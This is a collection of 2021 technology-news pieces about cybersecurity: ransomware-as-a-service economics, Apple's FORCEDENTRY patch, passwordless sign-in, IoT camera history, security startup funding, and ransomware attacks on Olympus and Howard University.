REvil is a solid choice for a villain’s name: R Evil. Revil. Evil and yet fun. I could imagine Black Widow, Hulk and Spider-Man teaming up to topple the leadership of REvil Incorporated.

The criminal gang using the name REvil may have enabled ransomware attacks on thousands of small businesses worldwide this summer — but the ransomware problem is bigger than REvil, LockBit or DarkSide. REvil has disappeared from the internet, but the ransomware problem persists.

REvil is a symptom, not the cause. I advise Tony Stark and his fellow Avengers to look past any one criminal organization — because there is no evil mastermind. Ransomware is just the latest in the 50,000-year evolution of petty criminals discovering get-rich-quick schemes.

The massive boom in the number of ransomware occurrences arises from the lack of centralized control. More than 304 million ransomware attacks hit global businesses last year, with costs surpassing $178,000 per event. Technology has created a market where countless petty criminals can make good money fast. The best way to fight this kind of threat is with a market-based approach.

The spike in global ransomware attacks reflects a massive “dumbing down” of criminal activity. People looking to make an illicit buck have many more options available to them today than they did even two years ago. Without technical chops, people can steal your data, hold it for ransom and coerce you to pay to get it back. Law enforcement has not yet responded to combat this form of cybercrime, and large, sophisticated criminal networks have likewise not yet figured out how to control the encroaching upstarts.

The spike in ransomware attacks is attributable to the “as a service” economy. In this case, we’re talking about RaaS, or ransomware as a service. This works because each task in the ransomware chain benefits from the improved sophistication enabled by the division of labor and specialization.

Someone finds a vulnerable target. Someone provides bulletproof infrastructure outside of the jurisdiction of responsible law enforcement. Someone provides the malicious code. The players all come together without knowing each other’s names. No need to meet in person as Mr. Pink, Mr. Blonde and Mr. Orange because the ability to coordinate tasks has become simple. The rapid pace of technological innovation created a decentralized market, enabling amateurs to engage in high-dollar crimes.

There’s a gig economy for the underworld just like there is for the legal business world. I’ve built two successful software companies, even though I’m an economist. I use open source software and rent infrastructure via cloud technologies. I operated my first software company for six years before I sought outside capital, and I used that money for marketing and sales more than technology.

This tech advancement is both good and bad. The global economy did better than expected during a global pandemic because technology enabled many people to work from anywhere.

But the illicit markets of crime also benefited. REvil provided a service — a piece of a larger network — and earned a share of proceeds from ransomware attacks committed by others — like Jeff Bezos and Amazon get a share of my company’s revenues for the services they provide to me.

To fight ransomware attacks, appreciate the economics — the markets that enable ransomware — and change the market dynamics. Specifically, do three things:

1. Analyze the market like a business executive

Any competitive business thinks about what’s allowing competitors to succeed and how they can outcompete. The person behind a ransomware strike is an entrepreneur or a worker in a firm engaged in cybercrime, so start with good business analytics using data and smart business questions.

Can the crypto technologies that enable the crime also be used to enable entity resolution and deny anonymity/pseudonymity? Can technology undermine a criminal’s ability to recruit, coordinate or move, store and spend the proceeds from criminal activities?

2. Define victory in market terms

Doing the analytics to understand competing firms allows one to more clearly see the market for ransomware. Eliminating one “firm” often creates a power vacuum that will be filled by another, provided the market remains the same.

REvil disappeared, but ransomware attacks persist. Victory in market terms means creating markets in which criminals choose not to engage in the activity in the first place. The goal is not to catch criminals, but to deter the crime. Victory against ransomware happens when arrests drop because attempted attacks drop to near zero.

3. Combat RaaS as an entrepreneur in a competitive market

To prevent ransomware is to fight against criminal entrepreneurs, so the task requires one to think and fight crime like an entrepreneur.

Crime-fighting entrepreneurs require collaboration — networks of government officials, banking professionals and technologists in the private sector across the globe must come together.

Through artificial intelligence and machine learning, the capability to securely share data, information and knowledge while preserving privacy exists. The tools of crime become the tools to combat crime.

No evil mastermind sits in their lair laughing at the chaos inflicted on the economy. Instead, growing numbers of amateurs are finding ways to make money quickly. Tackling the ransomware industry requires the same coordinated focus on the market that enabled amateurs to enter cybercrime in the first place. Iron Man would certainly agree.

#column, #computer-security, #crime, #cybercrime, #machine-learning, #malware, #open-source-software, #ransomware, #security, #security-breaches, #tc

Microsoft now lets you sign-in without a password

Microsoft is further nudging users away from passwords by rolling out passwordless sign-in options to all consumer Microsoft accounts.

The tech giant, like many others in the industry, has waged a war against traditional password-based authentication for some time. This is because passwords are a prime target for cyberattacks, since weak or reused passwords can be guessed or brute-forced through automated attacks.

To that end, and as it gears up to launch Windows 11 in just a few weeks time, Microsoft is rolling out its passwordless sign-in option, previously available only to commercial customers, to all Microsoft accounts. This means that users will be able to sign in to services, such as Outlook and OneDrive, without having to use a password. Instead, users can use the Microsoft Authenticator app, Windows Hello, a security key, and SMS or emailed codes.

Some Microsoft apps will still continue to require a password, however, including Office 2010 or earlier, Remote Desktop and Xbox 360. Similarly, those using now-unsupported versions of Windows won’t be able to ditch their passwords just yet either, as the feature will only be supported on Windows 10 and Windows 11.

Microsoft says that passwordless sign-in will be rolled out to consumer accounts over the coming weeks, so you might not be able to get rid of your password just yet. It added that it’s also working on a way to eliminate passwords for Azure AD accounts, with admins set to be able to choose whether passwords are required, allowed, or don’t exist for specific users.

#security

Apple patches “FORCEDENTRY” zero-day exploited by Pegasus spyware

Apple patches “FORCEDENTRY” zero-day exploited by Pegasus spyware

Enlarge (credit: Aurich Lawson | Getty Images)

Apple has released several security updates this week to patch a “FORCEDENTRY” vulnerability on iOS devices. The “zero-click, zero-day” vulnerability has been actively exploited by Pegasus, a spyware app developed by the Israeli company NSO Group, which has been known to target activists, journalists, and prominent people around the world.

Tracked as CVE-2021-30860, the vulnerability needs little to no interaction by an iPhone user to be exploited—hence the name “FORCEDENTRY.”

Discovered on a Saudi activist’s iPhone

In March, researchers at The Citizen Lab decided to analyze the iPhone of an unnamed Saudi activist who was targeted by NSO Group’s Pegasus spyware. They obtained an iTunes backup of the device, and a review of the dump revealed 27 copies of a mysterious GIF file in various places—except the files were not images.

Read 11 remaining paragraphs | Comments

#apple, #biz-it, #imessage, #ios, #iphone, #nso-group, #pegasus, #security, #spyware, #tech, #vulnerability, #zero-day

Apple patches a NSO zero-day flaw affecting all devices

Apple has released security updates for a newly discovered zero-day vulnerability that affects every iPhone, iPad, Mac and Apple Watch. Citizen Lab, which discovered the vulnerability and was credited with the find, urges users to immediately update their devices.

The technology giant said iOS 14.8 for iPhones and iPads, as well as new updates for Apple Watch and macOS, will fix at least one vulnerability that it said “may have been actively exploited.”

Citizen Lab said it has now discovered new artifacts of the ForcedEntry vulnerability, details it first revealed in August as part of an investigation into the use of a zero-day vulnerability that was used to silently hack into iPhones belonging to at least one Bahraini activist.

Last month, Citizen Lab said the zero day flaw — named as such since it gives companies zero days to roll out a fix — took advantage of a flaw in Apple’s iMessage, which was exploited to push the Pegasus spyware, developed by Israeli firm NSO Group, to the activist’s phone. The breach was significant because the flaws exploited the latest iPhone software at the time, both iOS 14.4 and later iOS 14.6, which Apple released in May. But also the vulnerabilities broke through new iPhone defenses that Apple had baked into iOS 14, dubbed BlastDoor, which were supposed to prevent silent attacks by filtering potentially malicious code. Citizen Lab calls this particular exploit ForcedEntry for its ability to skirt Apple’s BlastDoor protections.

In its latest findings, Citizen Lab said it found evidence of the ForcedEntry exploit on the iPhone of a Saudi activist, running at the time the latest version of iOS. Citizen Lab now says that the same ForcedEntry exploit works on all Apple devices running, until today, the latest software.

Citizen Lab said it reported its findings to Apple on September 7. Apple pushed out the updates for the vulnerability, known officially as CVE-2021-30860. Citizen Lab said it attributes the ForcedEntry exploit to NSO Group with high confidence, citing evidence it has seen that it has not previously published.

When reached, Apple declined to comment. NSO Group did not immediately comment.

Developing… More soon…

#apple, #imessage, #ios, #ipad, #ipads, #iphone, #mobile-phones, #nso-group, #operating-systems, #pegasus, #security, #smartphones, #spyware, #technology

The past, present and future of IoT in physical security

When Axis Communications released the first internet protocol (IP) camera after the 1996 Olympic games in Atlanta, there was some initial confusion. Connected cameras weren’t something the market had been clamoring for, and many experts questioned whether they were even necessary.

Today, of course, traditional analog cameras have been almost completely phased out as organizations have recognized the tremendous advantage that IoT devices can offer, but that technology felt like a tremendous risk during those early days.

To say that things have changed since then would be a dramatic understatement. The growth of the Internet of Things (IoT) represents one of the ways physical security has evolved. Connected devices have become the norm, opening up exciting new possibilities that go far beyond recorded video. Further developments, such as the improvement and widespread acceptance of the IP camera, have helped power additional breakthroughs including improved analytics, increased processing power, and the growth of open-architecture technology. On the 25th anniversary of the initial launch of the IP camera, it is worth reflecting on how far the industry has come — and where it is likely to go from here.

Tech improvements herald the rise of IP cameras

Comparing today’s IP cameras to those available in 1996 is almost laughable. While they were certainly groundbreaking at the time, those early cameras could record just one frame every 17 seconds — quite a change from what cameras can do today.

But despite this drawback, those on the cutting edge of physical security understood what a monumental breakthrough the IP camera could represent. After all, creating a network of cameras would enable more effective remote monitoring, which — if the technology could scale — would enable them to deploy much larger systems, tying together disparate groups of cameras. Early applications might include watching oil fields, airport landing strips or remote cell phone towers. Better still, the technology had the potential to usher in an entirely new world of analytics capabilities.

Of course, better chipsets were needed to make that endless potential a reality. Groundbreaking or not, the limited frame rate of the early cameras was never going to be effective enough to drive widespread adoption of traditional surveillance applications. Solving this problem required a significant investment of resources, but before long these improved chipsets brought IP cameras from one frame every 17 seconds to 30 frames per second. Poor frame rate could no longer be listed as a justification for shunning IP cameras in favor of their analog cousins, and developers could begin to explore the devices’ analytics potential.

Perhaps the most important technological leap was the introduction of embedded Linux, which made IP cameras more practical from a developer point of view. During the 1990s, most devices used proprietary operating systems, which made them difficult to develop for.

Even within the companies themselves, proprietary systems meant that developers had to be trained on a specific technology, costing companies both time and money. There were a few attempts at standardization within the industry, such as the Wind River operating system, but these ultimately failed. They were too small, with limited resources behind them — and besides, a better solution already existed: Linux.

Linux offered a wide range of benefits, not the least of which was the ability to collaborate with other developers in the open source community. This was a road that ran two ways. Because most IP cameras lacked the hard disk necessary to run Linux, hardware known as JFFS was developed that would allow a device to use a Flash memory chip as a hard disk. That technology was contributed to the open source community, and while it is currently on its third iteration, it remains in widespread use today.

Compression technology represented a similar challenge, with the more prominent data compression models in the late ’90s and early 2000s poorly suited for video. At the time, video storage involved individual frames being stored one-by-one — a data storage nightmare. Fortunately, the H.264 compression format, which was designed with video in mind, became much more commonplace in 2009.

By the end of that year, more than 90% of IP cameras and most video management systems used the H.264 compression format. It is important to note that improvements in compression capabilities have also enabled manufacturers to improve their video resolution as well. Before the new compression format, video resolution had not changed since the ’60s with NTSC/PAL. Today, most cameras are capable of recording in high definition (HD).

1996: First IP camera is released.
2001: Edge-based analytics with video motion detection arrive.
2006: First downloadable, edge-based analytics become available.
2009: Full HD becomes the standard video resolution; H.264 compression goes mainstream.
2015: Smart compression revolutionizes video storage.

The growth of analytics

Analytics is not exactly a “new” technology — customers requested various analytics capabilities even in the early days of the IP camera — but it is one that has seen dramatic improvement. Although it might seem quaint by today’s high standards, video motion detection was one of the earliest analytics loaded onto IP cameras.

Customers needed a way to detect movement within certain parameters to avoid having a tree swaying in the wind, or a squirrel running by, trigger a false alarm. Further refinement of this type of detection and recognition technology has helped automate many aspects of physical security, triggering alerts when potentially suspicious activity is detected and ensuring that it is brought to human attention. By taking human fallibility out of the equation, analytics has turned video surveillance from a reactive tool to a proactive one.

Reliable motion detection remains one of the most widely used analytics, and while false alarms can never be entirely eliminated, modern improvements have made it a reliable way to detect potential intruders. Object detection is also growing in popularity and is increasingly capable of classifying cars, people, animals and other objects.

License plate recognition is popular in many countries (though less so in the United States), not just for identifying vehicles involved in criminal activity, but for uses as simple as parking recognition. Details like car model, shirt color or license plate number are easy for the human eye to miss or fail to notice — but thanks to modern analytics, that data is cataloged and stored for easy reference. The advent of technology like deep learning, which features better pattern recognition and object classification through improved labeling and categorization, will drive further advancements in this area of analytics.

The rise of analytics also helps highlight why the security industry has embraced open-architecture technology. Simply put, it is impossible for a single manufacturer to keep up with every application that its customers might need. By using open-architecture technology, they can empower those customers to seek out the solutions that are right for them, without the need to specifically tailor the device for certain use cases. Hospitals might look to add audio analytics to detect signs of patient distress; retail stores might focus on people counting or theft detection; law enforcement might focus on gunshot detection — with all of these applications housed within the same device model.

It is also important to note that the COVID-19 pandemic drove interesting new uses for both physical security devices and analytics — though some applications, such as using thermal cameras for fever measurement, proved difficult to implement with a high degree of accuracy. Within the healthcare industry, camera usage increased significantly — something that is unlikely to change. Hospitals have seen the benefit of cameras within patient rooms, with video and intercom technology enabling healthcare professionals to monitor and communicate with patients while maintaining a secure environment.

Even simple analytics like cross-line detection can generate an alert if a patient who is a fall risk attempts to leave a designated area, potentially reducing accidents and overall liability. The fact that analytics like this bear only a passing mention today highlights how far physical security has come since the early days of the IP camera.

Looking to the future of security

That said, an examination of today’s trends can provide a glimpse into what the future might hold for the security industry. For instance, video resolution will certainly continue to improve.

Ten years ago, the standard resolution for video surveillance was 720p (1 megapixel), and 10 years before that it was the analog NTSC/PAL resolution of 572×488, or 0.3 megapixels. Today, the standard resolution is 1080p (2 megapixels), and a healthy application of Moore’s law indicates that 10 years from now it will be 4K (8 megapixels).

As ever, the amount of storage that higher-resolution video generates is the limiting factor, and the development of smart storage technologies such as Zipstream has helped tremendously in recent years. We will likely see further improvements in smart storage and video compression that will help make higher-resolution video possible.

Cybersecurity will also be a growing concern for both manufacturers and end users.

Recently, one of Sweden’s largest retailers was shut down for a week because of a hack, and others will meet the same fate if they continue to use poorly secured devices. Any piece of software can contain a bug, but only developers and manufacturers committed to identifying and fixing these potential vulnerabilities can be considered reliable partners. Governments across the globe will likely pass new regulations mandating cybersecurity improvements, with California’s recent IoT protection law serving as an early indicator of what the industry can expect.

Finally, ethical behavior will continue to become more important. A growing number of companies have begun foregrounding their ethics policies, issuing guidelines for how they expect technology like facial recognition to be used — not abused.

While new regulations are coming, it’s important to remember that regulation always lags behind, and companies that wish to have a positive reputation will need to adhere to their own ethical guidelines. More and more consumers now list ethical considerations among their major concerns—especially in the wake of the COVID-19 pandemic—and today’s businesses will need to strongly consider how to broadcast and enforce responsible product use.

Change is always around the corner

Physical security has come a long way since the IP camera was introduced, but it is important to remember that these changes, while significant, took place over more than two decades. Changes take time — often more time than you might think. Still, it is impossible to compare where the industry stands today to where it stood 25 years ago without being impressed. The technology has evolved, end users’ needs have shifted, and even the major players in the industry have come and gone according to their ability to keep up with the times.

Change is inevitable, but careful observation of today’s trends and how they fit into today’s evolving security needs can help today’s developers and device manufacturers understand how to position themselves for the future. The pandemic highlighted the fact that today’s security devices can provide added value in ways that no one would have predicted just a few short years ago, further underscoring the importance of open communication, reliable customer support and ethical behavior.

As we move into the future, organizations that continue to prioritize these core values will be among the most successful.

#column, #facial-recognition, #hardware, #internet-protocol, #ip-camera, #linux, #opinion, #physical-security, #security, #surveillance, #tc

BitSight raises $250M from Moody’s and acquires cyber risk startup VisibleRisk

BitSight, a startup that assesses the likelihood that an organization will be breached, has received a $250 million investment from credit rating giant Moody’s, and acquired Israeli cyber risk assessment startup VisibleRisk for an undisclosed sum.

Boston-based BitSight says the investment from Moody’s, which has long warned that cyber risk can impact credit ratings, will enable it to create a cybersecurity risk platform, while the credit ratings giant said it plans to make use of BitSight’s cyber risk data and research across its integrated risk assessment product offerings.

The investment values BitSight at $2.4 billion and makes Moody’s the largest shareholder in the company.

“Creating transparency and enabling trust is at the core of Moody’s mission,” Moody’s president and CEO Rob Fauber said in a statement. “BitSight is the leader in the cybersecurity ratings space, and together we will help market participants across disciplines better understand, measure, and manage their cyber risks and translate that to the risk of cyber loss.”

Meanwhile, BitSight’s purchase of VisibleRisk, a cyber risk ratings joint venture created by Moody’s and Team8, brings in-depth cyber risk assessment capabilities to BitSight’s platform, enabling the startup to better analyze and calculate an organization’s financial exposure to cyber risk. VisibleRisk, which has raised $25 million to date, says its so-called “cyber ratings” are based on cyber risk quantification, which allows companies to benchmark their cyber risk against those of their peers, and to better understand and manage the impact of cyber threats to their businesses.

Following the acquisition, BitSight will also create a risk solutions division focused on delivering a suite of critical solutions and analytics serving stakeholders including chief risk officers, C-suite executives, and boards of directors. This division will be led by VisibleRisk co-founder and CEO Derek Vadala, who previously headed up Moody’s cyber risk group.

Steve Harvey, president and CEO of BitSight, said the company’s partnership with Moody’s and its acquisition of VisibleRisk will expand its reach to “help customers manage cyber risk in an increasingly digital world.”

BitSight was founded in 2011 and has raised a total of $155 million in outside funding, most recently closing a $60 million Series D round led by Warburg Pincus. The startup has just shy of 500 employees and more than 2,300 global customers, including government agencies, insurers and asset managers. 

#articles, #boston, #computer-security, #cyberattack, #cybercrime, #cyberwarfare, #leader, #risk, #risk-analysis, #risk-management, #safety, #security, #team8, #warburg-pincus

Rezilion raises $30M help security operations teams with tools to automate their busywork

Security operations teams face a daunting task these days, fending off malicious hackers and their increasingly sophisticated approaches to cracking into networks. That also represents a gap in the market: building tools to help those security teams do their jobs. Today, an Israeli startup called Rezilion that is doing just that — building automation tools for DevSecOps, the area of IT that addresses the needs of security teams and the technical work that they need to do in their jobs — is announcing $30 million in funding.

Guggenheim Investments is leading the round with JVP and Kindred Capital also contributing. Rezilion said that unnamed executives from Google, Microsoft, CrowdStrike, IBM, Cisco, PayPal, JP Morgan Chase, Nasdaq, eBay, Symantec, RedHat, RSA and Tenable are also in the round. Previously, the company had raised $8 million.

Rezilion’s funding is coming on the back of strong initial growth for the startup in its first two years of operations.

Its customer base is made up of some of the world’s biggest companies, including two of the “Fortune 10” (the top 10 of the Fortune 500). CEO Liran Tancman, who co-founded Rezilion with CTO Shlomi Boutnaru, said that one of those two is one of the world’s biggest software companies, and the other is a major connected device vendor, but he declined to say which. (For the record, the top 10 includes Amazon, Apple, Alphabet/Google, Walmart and CVS.)

Tancman and Boutnaru had previously co-founded another security startup, CyActive, which was acquired by PayPal in 2015; the pair worked there together until leaving to start Rezilion.

There are a lot of tools out in the market now to help automate different aspects of developer and security operations. Rezilion focuses on a specific part of DevSecOps: large businesses have over the years put in place a lot of processes that they need to follow to try to triage and make the most thorough efforts possible to detect security threats. Today, that might involve inspecting every single suspicious piece of activity to determine what the implications might be.

The problem is that with the volume of information coming in, taking the time to inspect and understand each piece of suspicious activity can put enormous strain on an organization: it’s time-consuming, and as it turns out, not the best use of that time because of the signal to noise ratio involved. Typically, each vulnerability can take 6-9 hours to properly investigate, Tancman said. “But usually about 70-80% of them are not exploitable,” meaning they may be bad for some, but not for this particular organization and the code it’s using today. That represents a very inefficient use of the security team’s time and energy.

“Eight of out ten patches tend to be a waste of time,” Tancman said of the approach that is typically made today. He believes that as its AI continues to grow and its knowledge and solution becomes more sophisticated, “it might soon be 9 out of 10.”

Rezilion has built a taxonomy and an AI-based system that essentially does that inspection work as a human would do: it spots any new, or suspicious, code, figures out what it is trying to do, and runs it against a company’s existing code and systems to see how and if it might actually be a threat to it or create further problems down the line. If it’s all good, it essentially whitelists the code. If not, it flags it to the team.

The stickiness of the product has come out of how Tancman and Boutnaru understand large enterprises, especially those heavy with technology stacks, operate these days in what has become a very challenging environment for cybersecurity teams.

“They are using us to accelerate their delivery processes while staying safe,” Tancman said. “They have strict compliance departments and have to adhere to certain standards,” in terms of the protocols they take around security work, he added. “They want to leverage DevOps to release that.”

He said Rezilion has generally won over customers in large part for simply understanding that culture and process and helping them work better within that: “Companies become users of our product because we showed them that, at a fraction of the effort, they can be more secure.” This has special resonance in the world of tech, although financial services, and other verticals that essentially leverage technology as a significant foundation for how they operate, are also among the startup’s user base.

Down the line, Rezilion plans to add remediation and mitigation into the mix to further extend what it can do with its automation tools, which is part of where the funding will be going, too, Boutnaru said. But he doesn’t believe it will ever replace the human in the equation altogether.

“It will just focus them on the places where you need more human thinking,” he said. “We’re just removing the need for tedious work.”

In that grand tradition of enterprise automation, then, it will be interesting to watch which other automation-centric platforms might make a move into security alongside the other automation they are building. For now, Rezilion is forging out an interesting enough area for itself to get investors interested.

“Rezilion’s product suite is a game changer for security teams,” said Rusty Parks, senior MD of Guggenheim Investments, in a statement. “It creates a win-win, allowing companies to speed innovative products and features to market while enhancing their security posture. We believe Rezilion has created a truly compelling value proposition for security teams, one that greatly increases return on time while thoroughly protecting one’s core infrastructure.”

#agile-software-development, #alphabet, #amazon, #apple, #articles, #artificial-intelligence, #automation, #ceo, #cisco, #computer-security, #crowdstrike, #cto, #cyactive, #devops, #ebay, #energy, #entrepreneurship, #europe, #financial-services, #funding, #google, #ibm, #jp-morgan-chase, #kindred-capital, #maryland, #microsoft, #paypal, #security, #software, #software-development, #startup-company, #symantec, #technology

Technology giant Olympus hit by BlackMatter ransomware

Olympus said in a brief statement Sunday that it is “currently investigating a potential cybersecurity incident” affecting its European, Middle East and Africa computer network.

“Upon detection of suspicious activity, we immediately mobilized a specialized response team including forensics experts, and we are currently working with the highest priority to resolve this issue. As part of the investigation, we have suspended data transfers in the affected systems and have informed the relevant external partners,” the statement said.

But according to a person with knowledge of the incident, Olympus is recovering from a ransomware attack that began in the early morning of September 8. The person shared details of the incident prior to Olympus acknowledging the incident on Sunday.

A ransom note left behind on infected computers claimed to be from the BlackMatter ransomware group. “Your network is encrypted, and not currently operational,” it reads. “If you pay, we will provide you the programs for decryption.” The ransom note also included a web address to a site accessible only through the Tor Browser that’s known to be used by BlackMatter to communicate with its victims.

Read more on TechCrunch

Brett Callow, a ransomware expert and threat analyst at Emsisoft, told TechCrunch that the site in the ransom note is associated with the BlackMatter group.

BlackMatter is a ransomware-as-a-service group that was founded as a successor to several ransomware groups, including DarkSide, which recently bounced from the criminal world after the high-profile ransomware attack on Colonial Pipeline, and REvil, which went silent for months after the Kaseya attack flooded hundreds of companies with ransomware. Both attacks caught the attention of the U.S. government, which promised to take action if critical infrastructure was hit again.

Groups like BlackMatter rent access to their infrastructure, which affiliates use to launch attacks, while BlackMatter takes a cut of whatever ransoms are paid. Emsisoft has also found technical links and code overlaps between Darkside and BlackMatter.

Since the group emerged in June, Emsisoft has recorded more than 40 ransomware attacks attributed to BlackMatter, but that the total number of victims is likely to be significantly higher.

Ransomware groups like BlackMatter typically steal data from a company’s network before encrypting it, and later threaten to publish the files online if the ransom to decrypt the files is not paid. Another site associated with BlackMatter, which the group uses to publicize its victims and touts stolen data, did not have an entry for Olympus at the time of publication.

Japan-headquartered Olympus manufactures optical and digital reprography technology for the medical and life sciences industries. Until recently, the company built digital cameras and other electronics until it sold its struggling camera division in January.

Olympus said it was “currently working to determine the extent of the issue and will continue to provide updates as new information becomes available.”

Christian Pott, a spokesperson for Olympus, did not respond to emails and text messages requesting comment.

#africa, #colonial-pipeline, #crime, #crimes, #cyberattacks, #cybercrime, #digital-cameras, #electronics, #kaseya, #middle-east, #olympus, #ransomware, #security, #spokesperson, #u-s-government, #united-states

Have ‘The Privacy Talk’ with your business partners

As a parent of teenagers, I’m used to having tough, sometimes even awkward, conversations about topics that are complex but important. Most parents will likely agree with me when I say those types of conversations never get easier, but over time, you tend to develop a roadmap of how to approach the subject, how to make sure you’re being clear, and how to answer hard questions.

And like many parents, I quickly learned that my children have just as much to teach me as I can teach them. I’ve learned that tough conversations build trust.

I’ve applied this lesson about trust-building conversations to an extremely important aspect of my role as the chief legal officer at Foursquare: Conducting “The Privacy Talk.”

The discussion should convey an understanding of how the legislative and regulatory environment are going to affect product offerings, including what’s being done to get ahead of that change.

What exactly is ‘The Privacy Talk’?

It’s the conversation that goes beyond the written, publicly-posted privacy policy, and dives deep into a customer, vendor, supplier or partner’s approach to ethics. This conversation seeks to convey and align the expectations that two companies must have at the beginning of a new engagement.

RFIs may ask a lot of questions about privacy compliance, information security, and data ethics. But it’s no match for asking your prospective partner to hop on a Zoom to walk you through their broader approach. Unless you hear it first-hand, it can be hard to discern whether a partner is thinking strategically about privacy, if they are truly committed to data ethics, and how compliance is woven into their organization’s culture.

#column, #digital-advertising, #digital-rights, #ec-column, #ec-how-to, #foursquare, #identity-management, #lawyers, #privacy, #security, #startups, #terms-of-service, #verified-experts

Snyk snags another $530M as valuation rises to $8.4B

Snyk, the Boston-based late-stage startup that is trying to help developers deliver more secure code, announced another mega-round today. This one was for $530 million, with $300 million in new money and $230 million in secondary funding, the latter of which is to help employees and early investors cash in some of their stock options.

The long list of investors includes an interesting mix of public investors, VC firms and strategics. Sands Capital Ventures and Tiger Global led the round, with participation from new investors Baillie Gifford, Koch Industries, Lone Pine Capital, T. Rowe Price and Whale Rock Capital Management. Existing investors also came along for the ride, including Accel, Addition, Alkeon, Atlassian Ventures, BlackRock, Boldstart Ventures, Canaan Partners, Coatue, Franklin Templeton, Geodesic Capital, Salesforce Ventures and Temasek.

This round brings the total raised in funding to $775 million, excluding secondary rounds, according to the company. With secondary rounds, it’s up to $1.3 billion, according to Crunchbase data. The company has been raising funds at a rapid clip (note that the last three rounds include the Snyk money plus secondary rounds):

Snyk's last four funding rounds

While the company wouldn’t share specific revenue figures, it did say that ARR has grown 158% YoY; given the confidence of this list of investors and the valuation, it would suggest the company is making decent money.

Snyk CEO Peter McKay says that the additional money gives him flexibility to make some acquisitions if the right opportunity comes along, what companies often refer to as “inorganic” growth. “We do believe that a portion of this money will be for inorganic expansion. We’ve made three acquisitions at this point and all three have been very, very successful for us. So it’s definitely a muscle that we’ve been developing,” McKay told me.

The company started this year with 400 people and McKay says they expect to double that number by the end of this year. He says that when it comes to diversity, the work is never really done, but it’s something he is working hard at.

“We’ve been able to build a lot of good programs around the world to increase that diversity and our culture has always been inclusive by nature because we’re highly distributed.” He added, “I’m not by any means saying we’re even remotely close to where we want to be. So I want to make that clear. There’s a lot we still have to do,” he said.

McKay says that today’s investment gives him added flexibility to decide when to take the company public because whenever that happens it won’t have to be because they need another fundraising event. “This raise has allowed us to set up with strong, highly reputable public investors, and it gives us the financial resources to pick the timing. We are in control of when we do it and we will do it when it’s right,” he said.

#boston-startups, #developer, #funding, #recent-funding, #sands-capital-ventures, #security, #snyk, #startups, #tiger-global

Thoma Bravo takes a stake in threat intelligence provider Intel 471

Private equity giant Thoma Bravo has taken a stake in Intel 471, a provider of cyber threat intelligence for enterprises and governments.

The strategic growth investment, which comes as organizations double-down on cybersecurity amid a pandemic-fueled rise in cyber threats, will enable Intel 471 to evolve its product suite, broaden its go-to-market strategy and continue to “aggressively pursue innovation,” according to Thoma Bravo. Financial terms of the deal were not disclosed.

Intel 471, a Texas-based firm founded in 2014, takes a preventative approach to cybersecurity. It leverages its access to forums and dark web marketplaces to equip organizations with intelligence and monitoring on threat actors and malware attacks. Using the company’s platform, businesses can track threat actor activity and vulnerability exploits, analyze near-real-time monitoring of malware activity, trace threats that could cause security breaches, and receive alerts on compromised credentials.

“As cybercriminals and their tactics become increasingly sophisticated, our monitoring and intelligence solutions have become mission-critical, with organizations of all sizes looking to us to help them protect against attacks,” said Mark Arena, CEO of Intel 471.

Arena, along with fellow co-founder Jason Passwaters, will continue to lead Intel 471 and will retain a “significant” ownership position

Thoma Bravo’s investment in Intel 471 sees the private equity firm continue its cybersecurity investing spending-spree. Its recent $12.3 billion purchase of Proofpoint, for example, said to be the largest acquisition in cybersecurity history, trumps Broadcom’s $10.7 billion purchase of Symantec, Intel’s $7.6 billion acquisition of McAfee, and Okta’s proposed $6.5 billion acquisition of Auth0.

Thoma Bravo also previously acquired Sophos for $3.9 billion, took a majority stake in LogRhythm and paid $544 million for authentication startup Imprivata. 

#auth0, #broadcom, #ceo, #computing, #cybercrime, #cyberwarfare, #logrhythm, #mcafee, #security, #security-software, #sophos, #symantec, #technology, #texas, #thoma-bravo

TrueFort snares $30M Series B to expand zero trust application security solution

As companies try to navigate an ever-changing security landscape, it can be challenging to protect everything. Security startup TrueFort has built a zero trust solution focussing on protecting enterprise applications. Today, the company announced a $30 million Series B.

Shasta Ventures led today’s round with participation from new firms Canaan and Ericsson Ventures along with existing investors Evolution Equity Partners, Lytical Ventures and Emerald Development Managers. Under the terms of the agreement Nitin Chopra, managing director at Shasta Ventures will be joining the company board. Today’s investment brings the total raised to almost $48 million.

CEO and co-founder Sameer Malhotra says that TrueFort protects customers by analyzing at each application and figuring out what normal behavior looks like. Once it understands that, it will flag anything that falls outside of the norm. The company achieves this by gathering data from partners like CrowdStrike and from multiple points within the application and infrastructure.

“Once we get this telemetry, whether it’s networks, endpoints, servers or third party partners, we then help the customer build a picture of what those applications are doing and what’s normal behavior. We then help them baseline that, and monitor that in real time with response and real time controls to continue those applications through their normal life cycle,” he said.

Zero trust is a concept where as a matter of policy you assume that you cannot trust any individual or device until the entity proves it belongs on your systems. Malhotra says that customers are becoming more comfortable with the concept and in 2020 the company saw massive 650% revenue growth.

“We are seeing the demand, especially as zero trust is becoming a more familiar vernacular amongst the security community […]. Again, it’s having the visibility and understanding, and then being able to then reduce it to the limited number of acceptable relationships or executions,” he said. And he believes that it all comes down to understanding your applications and how they operate.

TrueFort co-founders Nazario Parsacala and Sameer Malhotra

TrueFort co-founders Nazario Parsacala and Sameer Malhotra

The company currently has 60 employees with hopes of reaching 85 or 90 by the end of the year. Malhotra says that as they build the employee base, they are driving to make it diverse at every level.

“We look at diversity across our whole management team, all the way from the board down to our different levels. We are quite aggressive in hiring diverse candidates, whether they’re women or LGBTQ or people of color. And we have focused programs where we work with different universities […] to bring on new employees from a diverse talent pool. We also work with different recruiters from that perspective, and our focus is always to look at a different palette and to make sure that we’re as diverse an organization as we can,” he said.

The company was founded in 2015 by Malhotra and his partner Nazario Parsacala, both of whom spent more than 20 years working at big financial services companies — Goldman Sachs and JP Morgan. They worked for a couple of years building the program, launching the first beta in 2017 before bringing the first generally available product to market the following year.

Currently customers can install the solution on prem or in the cloud of their choice, but the company has a SaaS solution in the works as well, that will be ready in the next couple of months.

#application-security, #enterprise, #funding, #recent-funding, #security, #shasta-ventures, #startups, #tc, #truefort, #zero-trust

Howard University cancels classes after ransomware attack

Washington D.C’s Howard University has canceled classes after becoming the latest educational institution to be hit by a ransomware attack.

The incident was discovered on September 3, just weeks after students returned to campus, when the University’s Enterprise Technology Services (ETS) detected “unusual activity” on the University’s network and intentionally shut it down in order to investigate.

“Based on the investigation and the information we have to date, we know the University has experienced a ransomware cyberattack,” the university said in a statement. While some details remain unclear — it’s unknown who is behind the attack or how much of a ransom was demanded — Howard University said that there is no evidence so far to suggest that personal data of its 9,500 undergraduate and graduate students been accessed or exfiltrated. 

“However, our investigation remains ongoing, and we continue to work toward clarifying the facts surrounding what happened and what information has been accessed,” the statement said.

